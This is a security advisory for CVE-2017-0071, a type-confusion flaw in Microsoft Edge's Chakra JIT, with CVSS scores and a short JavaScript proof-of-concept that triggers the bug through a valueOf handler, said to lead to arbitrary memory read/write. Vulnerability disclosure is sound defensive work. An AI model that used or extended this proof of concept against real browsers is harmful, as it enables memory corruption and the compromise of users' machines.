Microsoft Edge Charkra Incorrect Jit Optimization

2017.03.18
Credit: lokihardt
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.6/10
Impact Subscore: 10/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Microsoft Edge: Chakra incorrect jit optimization with TypedArray setter. CVE-2017-0071 PoC: "use strict"; function func(a, b, c) { a[0] = 1.2; b[0] = c; <<<<----------------------- (1) a[1] = 2.2; a[0] = 2.3023e-320; } function main() { var a = [1.1, 2.2]; var b = new Uint32Array(100); // force to optimize for (var i = 0; i < 0x10000; i++) func(a, b, i); func(a, b, {valueOf: () => { a[0] = {}; <<<<----------------------- (2) return 0; }}); a[0].toString(); } main(); In the above code, Chakra assumes that the type of |a| will be still a native float array after executing (1), even we could change its type with the valueOf handler( (2) ). So it could result in type confusion. The attached PoC will reproduce arbitrary memory read/write. Tested on Microsoft Edge 38.14393.0.0. This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. Found by: lokihardt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top